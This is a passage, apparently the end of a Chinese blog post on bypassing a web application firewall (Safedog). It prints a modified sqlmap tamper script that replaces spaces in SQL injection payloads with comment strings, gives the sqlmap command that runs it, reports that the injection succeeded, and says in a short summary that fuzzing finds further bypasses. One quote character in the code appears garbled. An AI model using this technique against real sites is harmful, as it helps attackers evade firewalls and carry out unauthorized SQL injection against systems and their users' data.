修改代码:
#!/usr/bin/env python2 """ Copyright (c) 2006-2019 sqlmap developers () See the file 'LICENSE' for copying permission """ from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload, **kwargs): """ Replaces space character (' ') with comments '/**/' Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls >>> tamper('SELECT id FROM users') 'SELECT/**/id/**/FROM/**/users' """ retVal = payload if payload: retVal = "" quote, doublequote, firstspace = False, False, False for i in xrange(len(payload)): if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/**/" continue elif payload[i] == ''': quote = not quote elif payload[i] == '"': doublequote = not doublequote elif payload[i] == " " and not doublequote and not quote: retVal += "/*Eor*/" continue retVal += payload[i] return retVal
使用命令:python2 sqlmap.py -r 1.txt –tamper=space2comment
开始sql注入
成功利用
0×03小结
这个只是简单的/**/注释绕狗,还有很多方法都可以使用我介绍的fuzz方法去过狗。还有一点不清楚为什么手工会失败,sqlmap里面就会成功,而且burp爆破也可以成功,有大佬知道的可以说说。